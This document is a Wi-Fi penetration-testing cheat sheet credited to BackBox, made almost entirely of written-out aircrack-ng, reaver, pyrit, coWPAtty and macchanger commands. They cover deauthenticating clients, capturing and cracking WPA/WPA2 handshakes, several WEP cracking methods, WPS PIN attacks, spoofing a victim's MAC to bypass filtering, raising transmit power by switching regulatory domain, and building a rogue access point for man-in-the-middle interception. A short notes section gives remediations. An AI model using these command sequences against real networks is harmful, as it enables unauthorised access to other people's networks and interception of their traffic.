all credits to @backbox.com for the following section (found below) original work found here

WPA/WPA2 PSK attack with aircrack-ng suite.

Place your wireless card into Monitor Mode

ifconfig wlan0 #Check wireless IFace
sudo airmon-ng check kill  #kill issue causing processes
sudo airmon-ng start wlan0 #start monitor mode
sudo airodump-ng wlan0mon  #start capturing
sudo airodump-ng --bssid 64:66:B3:6E:B0:8A -c 11 wlan0mon -w output
sudo aireplay-ng --deauth 5 -a 64:66:B3:6E:B0:8A wlan0mon   #deauthenticate the client
sudo aircrack-ng output-01.cap dict #crack the passphrase

Detect all available wireless AP’s and clients

airodump-ng mon0

Setting adapter channel

iwconfig mon0 channel <channel_number>

Capturing the four-way handshake

airodump-ng --channel <channel_number> --bssid <bssid> --write capture mon0

You can capture the handshake passively (it takes time) or de-authenticate a client.

De-authentication attack

aireplay-ng --deauth 3 -a <BSSID> -c <client_mac> mon0

Deauth every client - aireplay-ng -0 5 -a <bssid> mon0

Dictionary Attack

aircrack-ng -w passwords.lst capture-01.cap

Brute force Attack

crunch 8 8 0123456789 | aircrack-ng -e "Name of Wireless Network" -w - /root/home/wpa2.eapol.cap

WEP attack with aircrack-ng suite.

Place your wireless card into Monitor Mode

airmon-ng start wlan0

Detect all available wireless AP’s and clients

airodump-ng mon0

Setting adapter channel

iwconfig mon0 channel <channel_number>

airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

aircrack-ng -b (bssid) (file name-01.cap)

Rogue Access Point Testing

ifconfig wlan0 down

iw reg set BO

iwconfig wlan0 txpower 0

ifconfig wlan0 up

airmon-ng start wlan0

airodump-ng --write capture mon0

root@backbox:/home/backbox# ifconfig wlan0 down
root@backbox:/home/backbox# iw reg set BO
root@backbox:/home/backbox# ifconfig wlan0 up
root@backbox:/home/backbox# iwconfig wlan0 channel 13
root@backbox:/home/backbox# iwconfig wlan0 txpower 30
root@backbox:/home/backbox# iwconfig wlan0 rate 11M auto

Reaver

airmon-ng start wlan0
airodump-ng wlan0
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -S --no-nacks -d7 -vv -c 1

Pixie WPS

airmon-ng check
airmon-ng start wlan0
airodump-ng wlan0mon --wps
reaver -i wlan0mon -c 11 -b 00:00:00:00:00:00 -K 1

Wireless Notes

Wired Equivalent Privacy (WEP) RC4 stream cipher w/ CRC32 for integrity check - Attack: By sniffing an ARP packet, then replaying it to get many encrypted replies with different IVs. - Remediation: Use WPA2

Wifi Protected Access (WPA) Temporal Key Integrity Protocol (TKIP) Message Integrity Check - Attack: Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station. - Remediation: Use long-keys

Wifi Protected Access 2 (WPA2) Advanced Encryption Standard (AES) - Attack: Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station. - Remediation: WPA-Enterprise

WIRELESS ANTENNA

Open the Monitor Mode

root@backbox:~# ifconfig wlan0mon down
root@backbox:~# iwconfig wlan0mon mode monitor
root@backbox:~# ifconfig wlan0mon up

Increase Wi-Fi TX Power

root@backbox:~# iw reg set B0
root@backbox:~# iwconfig wlan0 txpower <NmW|NdBm|off|auto>
#txpower is 30 (generally)
#txpower is depends your country, please googling
root@backbox:~# iwconfig

Change WiFi Channel

root@backbox:~# iwconfig wlan0 channel <SetChannel(1-14)>

WEP CRACKING

Method 1 : Fake Authentication Attack

root@backbox:~# airmon-ng start wlan0
root@backbox:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon

What’s my mac?

root@backbox:~# macchanger --show wlan0mon
root@backbox:~# aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> wlan0mon
root@backbox:~# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <BSSID> -h <OurMac> wlan0mon
root@backbox:~# aircrack-ng -b <BSSID> <PCAP_of_FileName>

Method 2 : ARP Replay Attack

root@backbox:~# airmon-ng start wlan0
root@backbox:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon

What’s my mac?

root@backbox:~# macchanger --show wlan0mon
root@backbox:~# aireplay-ng -3 -x 1000 -n 1000 -b <BSSID> -h <OurMac> wlan0mon
root@backbox:~# aircrack-ng -b <BSSID> <PCAP_of_FileName>

Method 3 : Chop Chop Attack

root@backbox:~# airmon-ng start wlan0
root@backbox:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon

What’s my mac?

root@backbox:~# macchanger --show wlan0mon
root@backbox:~# aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
root@backbox:~# aireplay-ng -4 -b <BSSID> -h <OurMac> wlan0mon
 #Press ‘y’ ;
root@backbox:~# packetforge-ng -0 -a <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
root@backbox:~# aireplay-ng -2 -r <FileName2> wlan0mon
root@backbox:~# aircrack-ng <PCAP_of_FileName>

Method 4 : Fragmentation Attack

root@backbox:~# airmon-ng start wlan0
root@backbox:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon

What’s my mac?

root@backbox:~# macchanger --show wlan0mon
root@backbox:~# aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
root@backbox:~# aireplay-ng -5 -b <BSSID> -h < OurMac > wlan0mon
#Press 'y' ;
root@backbox:~# packetforge-ng -0 -a <BSSID> -h < OurMac > -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
root@backbox:~# aireplay-ng -2 -r <FileName2> wlan0mon
root@backbox:~# aircrack-ng <PCAP_of_FileName>

Method 5 : SKA (Shared Key Authentication) Type Cracking

root@backbox:~# airmon-ng start wlan0
root@backbox:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@backbox:~# aireplay-ng -0 10 -a <BSSID> -c <VictimMac> wlan0mon
root@backbox:~# ifconfig wlan0mon down
root@backbox:~# macchanger --mac <VictimMac> wlan0mon
root@backbox:~# ifconfig wlan0mon up
root@backbox:~# aireplay-ng -3 -b <BSSID> -h <FakedMac> wlan0mon
root@backbox:~# aireplay-ng --deauth 1 -a <BSSID> -h <FakedMac> wlan0mon
root@backbox:~# aircrack-ng <PCAP_of_FileName>

WPA / WPA2 CRACKING

Method 1 : WPS Attack

root@backbox:~# airmon-ng start wlan0
root@backbox:~# apt-get install reaver
root@backbox:~# wash -i wlan0mon -C
root@backbox:~# reaver -i wlan0mon -b <BSSID> -vv -S
#or, Specific attack
root@backbox:~# reaver -i -c <Channel> -b <BSSID> -p <PinCode> -vv -S

Method 2 : Dictionary Attack

root@backbox:~# airmon-ng start wlan0
root@backbox:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@backbox:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
root@backbox:~# aircrack-ng -w <WordlistFile> -b <BSSID> <Handshaked_PCAP>

Method 3 : Crack with John The Ripper

root@backbox:~# airmon-ng start wlan0
root@backbox:~# airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@backbox:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
root@backbox:~# cd /pentest/passwords/john
root@backbox:~# john -wordlist=<Wordlist> --rules -stdout|aircrack-ng -0 -e <ESSID> -w - <PCAP_of_FileName>

Method 4 : Crack with coWPAtty

root@backbox:~# airmon-ng start wlan0
root@backbox:~# airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@backbox:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
root@backbox:~# cowpatty -r <FileName> -f <Wordlist> -2 -s <SSID>
root@backbox:~# genpmk -s <SSID> -f <Wordlist> -d <HashesFileName>
root@backbox:~# cowpatty -r <PCAP_of_FileName> -d <HashesFileName> -2 -s <SSID>

Method 5 : Crack with Pyrit

root@backbox:~# airmon-ng start wlan0
root@backbox:~# airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@backbox:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
root@backbox:~# pyrit -r<PCAP_of_FileName> -b <BSSID> -i <Wordlist> attack_passthrough
root@backbox:~# pyrit -i <Wordlist> import_passwords
root@backbox:~# pyrit -e <ESSID> create_essid
root@backbox:~# pyrit batch
root@backbox:~# pyrit -r <PCAP_of_FileName> attack_db

Method 6 : Precomputed WPA Keys Database Attack

root@backbox:~# airmon-ng start wlan0
root@backbox:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@backbox:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
root@backbox:~# kwrite ESSID.txt
root@backbox:~# airolib-ng NEW_DB --import essid ESSID.txt
root@backbox:~# airolib-ng NEW_DB --import passwd <DictionaryFile>
root@backbox:~# airolib-ng NEW_DB --clean all
root@backbox:~# airolib-ng NEW_DB --stats
root@backbox:~# airolib-ng NEW_DB --batch
root@backbox:~# airolib-ng NEW_DB --verify all
root@backbox:~# aircrack-ng -r NEW_DB <Handshaked_PCAP>

FIND HIDDEN SSID

root@backbox:~# airmon-ng start wlan0
root@backbox:~# airodump-ng -c <Channel> --bssid <BSSID> wlan0mon
root@backbox:~# aireplay-ng -0 20 -a <BSSID> -c <VictimMac> wlan0mon

BYPASS MAC FILTERING

root@backbox:~# airmon-ng start wlan0
root@backbox:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@backbox:~# aireplay-ng -0 10 --a <BSSID> -c <VictimMac> wlan0mon
root@backbox:~# ifconfig wlan0mon down
root@backbox:~# macchanger --mac <VictimMac> wlan0mon
root@backbox:~# ifconfig wlan0mon up
root@backbox:~# aireplay-ng -3 -b <BSSID> -h <FakedMac> wlan0mon

MAN IN THE MIDDLE ATTACK

root@backbox:~# airmon-ng start wlan0
root@backbox:~# airbase-ng -e “<FakeBSSID>” wlan0mon
root@backbox:~# brctl addbr <VariableName>
root@backbox:~# brctl addif <VariableName> wlan0mon
root@backbox:~# brctl addif <VariableName> at0
root@backbox:~# ifconfig eth0 0.0.0.0 up
root@backbox:~# ifconfig at0 0.0.0.0 up
root@backbox:~# ifconfig <VariableName> up
root@backbox:~# aireplay-ng -deauth 0 -a <victimBSSID> wlan0mon
root@backbox:~# dhclient3 <VariableName> &
root@backbox:~# wireshark &; select <VariableName> interface